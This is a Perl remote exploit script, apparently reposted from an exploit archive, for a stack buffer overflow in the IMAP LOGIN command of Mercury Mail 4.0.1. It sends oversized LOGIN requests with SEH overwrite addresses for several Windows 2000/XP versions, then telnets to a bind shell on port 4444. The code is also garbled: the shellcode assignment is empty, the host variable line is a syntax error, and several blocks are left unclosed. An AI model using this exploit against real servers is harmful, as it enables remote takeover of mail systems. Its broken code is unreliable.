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Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Expl

Jacopo Cervini
Security Risk Unsored
remote exploits
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Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

# http://www.securityfocus.com/bid/11775
# credit to Muts for this vulnerability
# acaro [at] jervus.it

use IO::Socket::INET;
use Switch;

if (@ARGV < 3) {
print "--------------------------------------------------------------------\n";
print "Usage : mercury-4444-multi.pl -hTargetIPAddress -oAssemblyinstructions\n";
print " Return address: \n";
print " 1 - Windows 2k Sp4 English Version\n";
print " 2 - Windows 2k Sp4 Italian Version\n";
print " 3 - Windows XP Sp1 English Version\n";
print " 4 - Windows XP Sp0 English Version\n";
print " If values not specified, Windows 2k Sp4 will be used.\n";
print " Example : ./mercury-4444-multi.pl -h127.0.0.1 -o1 -o1\n";
print "--------------------------------------------------------------------\n";

use IO::Socket::INET;

my $host =;
my $port = 143;
my $reply;
my $request;
my $jmp="\xe9\x02\xff\xff\xff";

my $nextseh = "\x90\x90\xeb\x09";

#A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences
#1)bind port, in this exploit is 4444 in the original shellcode was 6666
#2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host
my $shellcode = 

foreach (@ARGV) {
$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
$seh = $1 if ($_=~/-o(.*)/);
$happy = $1 if ($_=~/-o(.*)/);

switch ($seh) {
case 1 { $seh="\x43\x8f\x2d\x7c" } # Win2k SP4 English version jmp ebx in advapi32.dll
case 2 { $seh="\x43\x8f\x26\x79" } # Win2k SP4 Italian version jmp ebx in advapi32.dll
case 3 { $seh="\xc0\x5f\x3c\x76" } # WinXP Pro English SP1 version pop ecx pop ecx ret in comdlg32.dll
case 4 { $seh="\xfc\x61\x3c\x76" } # WinXP Pro English SP0 version pop ecx pop ecx ret in comdlg32.dll

switch ($happy) {
case 1 { $happy="\x8d\x83\x34\xff\xff\xff\x50\xc3" } # Win2k SP4 English version
case 2 { $happy="\x8d\x83\x34\xff\xff\xff\x50\xc3" } # Win2k SP4 Italian version
case 3 { $happy="\x8b\xc1\x66\x05\x34\x29\x50\xc3" } # WinXP Pro English SP1 version
case 4 { $happy="\x8b\xc1\x66\x05\x34\x29\x50\xc3" } # WinXP Pro English SP0 version

my $request ="1 LOGIN".(" "x948)."\{255\}\n";

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;

send $socket, $request, 0;
print "[+] Sent 1st request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;

my $request ="\x41" x 255;

send $socket, $request, 0;
print "[+] Sent 2nd request\n";

my $request=("\x45" x7420).("\x90" x10).$happy.("\x90" x14).$shellcode.("\x41" x8).$nextseh.$seh.("\x90" x5).$jmp.("\x90" x533);

send $socket, $request, 0;
print "[+] Sent final request\n";


print " + connect on port 4444 of $host ...\n";
system("telnet $host 4444");

#  0day.today [2024-09-12]  #